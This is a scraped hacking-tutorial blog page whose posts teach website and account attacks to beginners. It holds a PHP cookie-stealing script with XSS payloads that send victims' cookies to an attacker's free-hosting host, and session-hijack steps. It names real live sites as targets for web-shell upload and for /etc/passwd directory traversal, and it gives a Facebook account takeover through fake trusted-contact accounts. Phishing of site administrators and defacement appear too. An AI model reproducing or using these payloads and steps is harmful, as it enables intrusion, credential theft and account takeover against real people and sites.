BSQL Hacker : Automated SQL Injection Framework Tool

Tweet

It's easy to use for beginners and provide great amount of customisation and automation support for experienced users. Features a nice metasploit alike exploit repository to share and update SQL Injection exploits.

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.

BSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

Videos

• Sample exploitation and Injection Wizard Demo
• Error Based Injections and Attack Template Usage

Download

• New version is out, it's mostly bug fixed, CLICK HERE to download.

Screenshot

 

Key Features

• Easy Mode
• SQL Injection Wizard
• Automated Attack Support (database dump)
• ORACLE
• MSSQL
• MySQL (experimental)
• General
• Fast and Multithreaded
• 4 Different SQL Injection Support
• Blind SQL Injection
• Time Based Blind SQL Injection
• Deep Blind (based on advanced time delays) SQL Injection
• Error Based SQL Injection
• Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
• RegEx Signature support
• Console and GUI Support
• Load / Save Support
• Token / Nonce / ViewState etc. Support
• Session Sharing Support
• Advanced Configuration Support
• Automated Attack mode, Automatically extract all database schema and data mode

• Update / Exploit Repository Features
• Metasploit alike but exploit repository support
• Allows to save and share SQL Injection exploits
• Supports auto-update
• Custom GUI support for exploits (cookie input, URL input etc.)

• GUI Features
• Load and Save
• Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
• Visually view true and false responses as well as full HTML response, including time and stats

• Connection Related
• Proxy Support (Authenticated Proxy Support)
• NTLM, Basic Auth Support, use default credentials of current user/application
• SSL (also invalid certificates) Support
• Custom Header Support

• Injection Points (only one of them or combination)
• Query String
• Post
• HTTP Headers
• Cookies

• Other
• Post Injection data can be stored in a separated file
• XML Output (not stable)
• CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)

Read More

Click Jacking Attack

Tweet

Definition

"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages."

Introduction

A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins like Flash."

How It Works?

ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.

ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.

So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

JavaScript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples

• Malicious camera spying using Adobe's Flash.
•  Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.
• The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.    

Read More

Basics about Shell Uploading

Tweet

I am sure many have you have read about "Hacked / Defaced with shells", So I am pretty sure that the first thing that comes to your mind is "What the heck are these shells?" . So this article would give you complete idea about shells and its use.

I will soon write about "RFI, LFI" which are somewhat connected with shells. Meanwhile, keep playing with it and learn more. As without practice you won't get anything.

Difference between FTP & Shells:

Many times I see that some of us know how to use the shell but once they have uploaded they get confused. So to start with, Let me give you some information about FTP:

• File Transfer Protocol

Whenever you want to open your website, the first thing you will do is to get some web hosting for your self. That cud be either free or paid. When your get your hosting services, you create a website on your computer first and then upload it to your hosting server so it becomes a World Wide Web. This process of uploading the documents from your computer to your hosting server is done through FTP [File Transfer Protocol]. It basically looks like a program with 2 columns, one column shows your computer files and another shows your servers files. Just like when you copy the stuffs from some USB drive to your computer. So here, I will show you an example is how you would connect if you own example.com. So when you want to connect your self to your web hosting server, following information is required in order to authenticate yourself:

Server : ftp.example.com
Username: XEO
Password: whatever

So, once you put in this information, server understands that you are XEO and gives you access to all the files on the server so you can work on it.

•   Shells

Since you understand the FTP now, we know that none of us will get access to Go4expert's server because we don't have the username and password authenticate yourself. Somehow we can manage to get the access to G4E's FTP we can easily remove/edit/replace files. So we can destroy this entire forum and upload our own stuffs. That is when shells comes into the picture. Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly WITHOUT authenticating your self.

• Moral of the Story:

I wrote the difference between FTP and shells so that you guyz can understand it, because lots of people tends to get confused between them. So again to make it clear, you can following thing:

FTP is a protocol that lets you connect your computer to your hosting server so that you can upload/edit/delete/replace your files. Since we wouldn't have the username & password to connect to any website's ftp, thats why we will use the SHELL to get access. SO SHELL IS NOT FTP BUT IT GIVES YOU ACCESS TO THE HOSTING SERVER.

• Funny Incidents:

Let me tell you guyz why i gave time to write this much about FTP in this article.I remember i saw couple of threads which said following thing:

"Hi guyz, i managed to hack my 1st website today! YAY, I am really happy! But theres only 1 problem, i uploaded the shell and ran it and it worked fine. The only problem is i dont have access to FTP."

Y0, i hacked a website today, uploaded a shell and it worked fine, now i am trying to get access to FTP

• Main Logic

Shell is not a tool that you can run and complete your work. As I said, its just a normal ".php" file, you have to find a way in any website to upload that shell. The Idea is, you upload the shell to any website so it will be saved on their server and it will give you the access to it.

Phase 1 : Uploading a shell:

Suppose you want to hack "something.com". So the first thing that you will do is, open up "something.com", and try to find some place from where you can upload the files on the website. There are many such places for example, "file uploads, avatars, resume upload, cooking recipe uploads, upload your photo". So these are the places which will give you an opportunity to upload your shell. All you have to do is, try to upload the shell.php which is located in your computer and click on submit. So suppose you went to the webpage "something.com/submit_resume.php" and you uploaded your resume.

Phase 2 : Executing your uploaded shelll:

Once we have uploaded the shell as shown in "Phase:1", we know that its sitting on the server. The only thing we need to do now is to execute the shell from a browser so we get access to it.

• Example:

So suppose i uploaded my shell as an attachment in any thread. SO now that attachment is sitting on that thread's server. Now if we want to executive it, we will use following URL:

Code: http://www.something.com/forums/attachment.php?attachmentid=456&d=1249607339

So that is the DIRECT url to the attachment which is called EXECUTION. In the same way if you execute your shell, it will take you to a webpage where you will see everything thats on the server. And you will have FULL ACCESS to remove/edit/replace/delete the files. So you are another XEO !

Phase 3 : Defacing:

Defacing is a word which means "replacing the current index file with our own index with our motive and slogan on it". So once you have access to the server, you are the king

• Different types of shells:

There are many shells available, most of them are public and some of them are private. Most of them does the samething to give you the access of the server. "c99, r57, b0yzone, j32" are some very common and easily available shells.

• Where do I get them from?

The best way is Google search with "inurl:c99.txt". You can replace c99 with r57, j32 or anything else.

Important Piece of advice

I would suggest you to download WAMP SERVER, which lets you make your own server on your comptuer. And then try to use shells on it. Which will help you avoid hacking in live environment. Because, if webmaster is smart then, he can simply check the logs for that shell fine and track down your IP which executed the shell. Then you might be in problem.

Thanks for your time to read the article . Hope you liked it . PEACE!

Read More

How To Re-Enable Right Click on Websites in Mozilla Firefox

Tweet

Many times we come across several websites where the right click has been disabled. This is done mainly to avoid any copying of text or images from the webpages of the website. Now follow the following steps in order to enable right click on various right click disabled websites. The disabling of the right click is done mainly by the means of JavaScript and thus it will also depend on the browser that you might be using. Here we will tell you how to disable it on Mozilla Firefox, Internet Explorer and Google Chrome.

Steps To Follow

• Download the RightToClick add-on from the link given below and install it. https://addons.mozilla.org/en-US/firefox/addon/12572/ 
• On installation a golden arrow will appear on the top right corner. When any right click disabled site appears then click on the mouse pointer to generate various options for the right click.
• You can access and tweak with the advanced options by clicking on the mouse icon or by going to Tools and then clicking on the RightToClick.

Read More

Vulnerability in Ajax File Manager - Upload Shell

Tweet

AJAX is about updating parts of a web page, without reloading the whole page.



 

•  First of all open Google Search Engine.
• Now type this google dork in it inurl:/plugins/ajaxfilemanager/ 
• Now hit Search and open any website shown in the result.

For Example :

• http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ 
• http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/

or any site else ...

• Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url.
• It will look like as below :

For example : 

• http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php 
• http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

• Now Find Upload and Upload Your shell/Deface/file 
• To view you File find /Uploaded/ directory in Website by using your brain.

Read More

How to increase Facebook page likes - G+ ones - Twitter Followers

Tweet

• CLICK HERE to join .

Read More

Splitting the Cookie Catcher Code Line by Line for Understanding

Tweet

Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

• This is the same code as I have posted in previous tutorial.

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.

<?php
Write the Code Here
?>

• These two code lines tell the server that the code written inside them is php code.
• First line is the starting line of code and and the second tells about its end and the code comes within these lines.

$cookie = $_GET['cookie'];

• This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement

$ip = $_SERVER['REMOTE_ADDR'];

• REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.

$date=date(“j F, Y, g:i a”);

• Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.

$referer=$_SERVER['HTTP_REFERER'];

• HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.

$fp = fopen('cookies.html' 'a');

•  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.

fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);

• In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
• It writes the Cookie ,Date and Time and Website in the opened file cookies.html .

fclose($fp);

• After writing all the data in cookies.html ,this code finally close the file.

header ("javascript:history.back()");

• This final line of code sends the user back to the last page fro where he clicked on your link.
• This code is very useful as victim has no idea that his cookies are captured.

That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .

NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

Read More

What is Cookie Catcher and How to Get Cookies Using it

Tweet

Hello guys , hope you all are enjoying good health. the day before yesterday I have completed my tutorial on XSS in which we checked Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent  Method In those tutorials I have told that we have to use cookie catcher tool to get the cookies in our online free php hosting account . After that I got a lot of questions about Cookie Catcher like what is it etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.

What is Cookie ?

• First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
• Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
• This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a cookie catcher?

• A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
• Hacker usually sends you a code or link and this link is connected to the cookie catcher.
• When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.

Is making a cookie catcher hard ?

• Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
• The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
• In fact the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

• Copy the below code in a notepad :
  

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

• Save this notepad as CookieCatcher.php
• Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

• Now the question arises how can we use a cookie catcher.
• First of all create a free account on 0fees.net
• After creating account open cpanel.0fees.net and log in to your account.
• Now under File Management , click on Online File Manager .
• Now open htdocs and upload the CookieCatcher.php file in it.
• Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.

<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>

• Make sure to change user username .
• After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.

NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

Read More

Hack Websites using XSS Attack - Non Presistent Method

Tweet

Hello guys, hope you are fine.Well yesterday we have discussed Hack Website using XSS Attack in which we learn the first type of XSS i.e. Persistent XSS .Today we will discuss it a little further in which we will cover second type of Xss and how to hijack session after XSS.One more thing guys, don't ask me to personally teach you this stuff as I don't have much time and its really hectic but if you have any problem clear it in comments and I will completely satisfy you while answering your problem . So , I think now we should start so let's start :

Non-Persistent XSS:

In this method we will force our victim to go to our link,initial steps are almost similar to previous method.

• First of all we will search for a XSS vulnerable site.
• After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
• To check this add this simple code in the search box and click the search button.
  

Code:

<script>alert(document.cookie)</script>

• After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
• Now after confirming the vulnerability add the below code in the url of this search.php page.

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Now we have to shrink the link of whole page for this use tinyurl or any other such service.
• Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
• After getting the email id send him a fake email from any online fake mailer or through your fake id.
• In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
• Tinyurl will mask the link and don't let it to go to spam
• Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. 
• No matter what he does and changes his password you can still login as him.

NOTE : Among these two types of XSS , Persistent is used most commonly and is the best way to get cookies.

Session Hijack

Until now we have discussed that how to get cookies of someone using XSS and now we will check how to use these cookies to enter into the victim's account .This is called Session Hijack.

• Ok now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies. 
• First of all go to that site's admin login or its main page whose cookies you have.
• Now delete ALL of your cookies from that page.For this check the topic on cookies. 
• Now go in your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: in a notepad.These are the cookies. 
• This sign ; separates cookies from each other so first copy the code before the ;i.e the first cookie.
• Now come back to that vulnerable site and instead of  link add the following code but don't hit enter:

Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")

• Add that cookie in between " " and now hit enter.
• Do this with all of the cookies and refresh the page.
• And hurrah!!! you are logged in as administrator.
• So now go in your admin panel and upload your deface page,now you can do anything to that site.

That's all for today,hope you guys like it , I will try to make a video tutorial on it . If you guys have any problem ask in the comments. Have fun .... Take care ..... :))

Read More

Hack Websites using XSS Attack

Tweet

I have already posted about How to Hack Website Completely using SQL Injection and I have also  posted a Video Tutorial on it.Today I am going to start on XSS.I know most of the guys don't know even about its name so I am gonna start it from very basics to give you the whole concept of it .Hope you guys like it .

Introduction of XSS

• XSS attack is used to hack websites online and it mostly works on those sites which use cookies for storing your username and password when you log in that site.Check this Wikipedia article for knowing what are cookies.
• XSS usually works on those sites which allows users to add any code in an open place like starting new thread in forums or can send codes using messages to other members.It is actually a script / a code which attacker submit and whoever clicks or even see it got affected .
• The purpose of the attacker or hacker doing XSS is to steal the cookie of a user, which is currently log in on that site and viewing that code submitted by the hacker, so that he can later use that cookie to get into his account . (Steal in this context means just get a copy of cookie, rather than removing the original cookie).

For Example : User A log in on a site and user B use XSS attack and gets the cookie of user A , now user B can easily come into the account of user A using these cookies ..... :))

Finding a XSS Vulnerable sites:

• First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
• To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :

Code:

"><script>alertundefineddocument.cookie)</script>

Code:

'><script>alertundefineddocument.cookie)</script>

Code:

"><script>alertundefined"Test")</script>

Code:

'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:

Code:

"><body bgcolor="FF0000"></body>

Code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

• After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
• Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.

Types of XSS Attack

• There are two types of mostly used XSS attacks named :

1. Persistent XSS
2. Non-Persistent XSS

Persistent XSS:

• This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
• So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
• So now lets try to grab it's cookies.
• First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
• Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:

Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
• Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
•  Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 
• Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
• Now save these cookies as we gonna use them to hijack session of victim.... ;)

That's all for today ,I will post more on it tomorrow in which we will check Non-persistent XSS and also check how to use these cookies to hijack the session of victim .If you have any question till now may ask in comments..... Take care ... :))

---

Update : I have posted the the second part of this tutorial named Hack Website using XSS Attack - Non Persistent  Method.

Read More

Hack website completely using SQL Injection - Video Tutorial

Tweet

I have posted a complete  tutorial about How to Hack Websites using SQL Injection . But man guys are having problem using SQL so here's a video tutorial in which I have hacked a website completely using SQL Injection. Just follow this simple steps and hack that site . If having any problem then ask in the comments. Make sure to write the code as it is,particularly take much care of spaces as they are really confusing where we have to add space and where we dont need to add space.

Hack website completely using SQL Injection - Part 1

• First part of Video Tutroial :

Hack website completely using SQL Injection - Part 2

• Second part of Video Tutroial :

NOTE : This tutorial is only for educational purposes and the team of HWS is not responsible in any way for how this information is used, use it at your own risk.

Read More

Hack facebook account password using recovery password loophole

Tweet

I am going to teach you Hacking Facebook account passwords, i have already explained Hacking Facebook accounts or password using keyloggers and Phishing and also we learnt how to hack facebook using tabnabbing but this is absolutely manual method to hack Facebook password and its working...Did you got  a shock if not, then you will get after reading this article. Facebook is adding more and more features to attract users but when you develop something that's for sure you will introduce new loopholes. Today i will explain you how to hack a Facebook account password just by utilizing recovery password loophole. These novice coders think that they have made secured features but they really doesn't their daddy is sitting outside.

Note :  This trick works after 24 hours if victim account is not logged in in 24 hours then only you can hack dude... and this is not a good hacking trick.

Requirement to hack someone's Facebook account:

• Victim (whose Facebook account password you wanna hack) should be on Facebook.
• Create four to five fake Facebook accounts(three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girls photograph. Fill the basic profile.. Why i am saying create account with Girl names is just because Hungry boys accepts girls friend request without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.
• Most important requirement you need to add all above three account to the friends list of victim whose Facebook account you want to hack. Above method will be helpful for that :P.
• At least two web browsers. So that one can be used as recovery purpose and one for viewing codes.

So guys i hope you all are clear with requirements to hack Facebook account password. Now lets hack someone's  Facebook account password practically to show that hacking Facebook account really works.

Steps to hack any Facebook account

• Open the Facebook in your web browser.
• Now Click on Forgot your password? Now a new tab will open something like this. In the email box give the email ID and press enter or click on search button as shown in below snapshot..

• Now after Clicking on search you will get an Captcha verification. Type the words displayed and press enter.
• Now You have reached to the screen Where Facebook gives the search results of the identity of previous step. There you will see button saying "This is my account" just click on that as shown below in snapshot:

• Now you have reached to the below Facebook password recovery screen as show below:

• Now Click on "No Longer have access to these?" hyperlink to go to next step.
• Ahhah... It sounds great everything going smoothly... So friends after following above step facebook asks you to Enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this.
• After submitting you will have either of two situations:

a. First One will be recover your account with friends.
b. Answer the security question if victim has set the security question.

• Now what...Oops.. he has set the security question and i dont know the answer... What should i do??.....Scared ... nopes...worried... nopes... Let's enter wrong answer to his security question three times...
• Now you are at screen saying " Recover your password using your friends" as shown below in snapshot.

• Just click on continue and select the three trusted friends :P The three fake accounts that we have created for him to hack his account....:P..
• You can also perform this hack by making your friends participate to hack someones account...Now select three accounts one by one as one... Below is the screen shot showing that i have selected three friends whom i am sending codes.

• Foow....Oops.. I got all the three codes....Below is the screen where you will enter those three codes that you have received...

• So guys we are done.... Fill the codes into boxes that you have received into you messages in Facebook and on email if feed is subscribed.
• Click on submit now it will ask you to validate your email account that you have filled . That email should be genuine as you will receive recovery email on that email account only.

That's All !!!

Feel free to ask any question ..... :))

Read More

Discover Popular Content Of Websites With BuzzGrowl [Chrome]

Tweet

BuzzGrowl is a Google Chrome extension which can help users to keep abreast with trending topics of  the currently opened website. A small window, showing tweets from random people pops-up everytime when it finds something in relation with the website you’re surfing. For instance, if you’re checking out an article on Wikipedia, its windows at the bottom-right corner will let you know the articles which people are exchanging with each other over at Twitter. Since Twitter is widely used social media component for sharing information and news, BuzzGrowl would certainly be helpful for those who like to discover hot topics and articles of a website and keep a tab on news which is currently being circulated on Twitter.

Being a distraction-free extension, it can be enabled/disabled with a single click by clicking its icon present at top-right corner. When you want to check the tweets of the website in question, enable it to find out the most popular content of the website. Tweet window will start popping-up with options to share it on Facebook wall and Twitter. You can also use navigation controls present at each end of pop-up window to sift through the tweets.
BuzzGrowl extension for Google Chrome

Read More

Block Website Within Defined Time Range In Chrome

Tweet

Google Chrome users looking for a simple way to block websites can try Website Blocker. It is intended to set users focus straight on work by allowing them to block those frequently used websites which act as a catalyst in loosing focus. You can use it to prevent kids from opening websites which contain explicit adult content, chat rooms, etc. One interesting aspect is that you can apply a time limit for keeping websites completely in-accessible in office timings. You can for instance block Facebook in work hours by specifying 0800-1700, so you can keep focus on work instead of socializing in defined span of time.

After the extension is installed, you need to enter the website URL with a time range to block the accessibility. It provides some samples which you can modify to instantly block a list of websites. The time limit and block function can be enabled/disabled from Basic Settings. Once you have listed all the URLs with time ranges, verify by accessing the blocked webpage.If it’s still accessible, restart the browser and clear the cache.
When the blocked page is accessed, it shows default message “Can’t access to this page”. However, you can change this message from Options page.

The extension is in experimental stages yet works fine without showing any problems. Nonetheless, we feel that it’d have been great if password protection was provided.

Website Blocker extension for Google Chrome

Read More

How to find a vulnerable Website?

Tweet

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.
Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking

 Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

• SQL Injection
• XSS(Cross Site Scripting)
• Remote File Inclusion(RFI)
• Directory Traversal attack
• Local File inclusion(LFI)
• DDOS attack

Tools commonly used to find a vulnerable website

Acunetix

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Download Acunetix Web Security Scanner

Nessus

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus from the link below
http://www.nessus.org/download

Retina-

Retina is another Vulnerability assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina



Metasploit Framework

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit(For Windows users) from the link below
http://www.metasploit.com/releases/framework-3.2.exe

Download Metaspolit(For Linux users) from the link below
http://www.metasploit.com/releases/framework-3.2.tar.gz

Read More

Hack a website using Directory Transversal attack?

Tweet

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx . 

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input

Read More

How do i block and unblock internet sites

Tweet

Learn to block and unblock internet sites
Some times it becomes necessary to block and unblock internet website on our Computers for one or other reason.

Procedure to block an unblock internet sites:

• Go to Start and type RUN .
• Type C:\WINDOWS\system32\drivers\etc
• Open the file "HOSTS" in a notepad
• Under "127.0.0.1 localhost" . Add IP Name
  IP - IP of the site to be blocked
  Name - Name of the site (see the pic below for example

Example :
127.0.0.1 localhost
210.210.19.82 www.sifymall.com

Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.

Read More

Tweet

What is a Denial Of Service Attack?


A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

bandwidth attacks,
protocol attacks
logic attacks


What is Distributed Denial of Service Attack?

To hack a website An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.
This makes it difficult to detect because attacks originate from several IP addresses.
If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Damages made By Denial of service attack:

Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack
Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

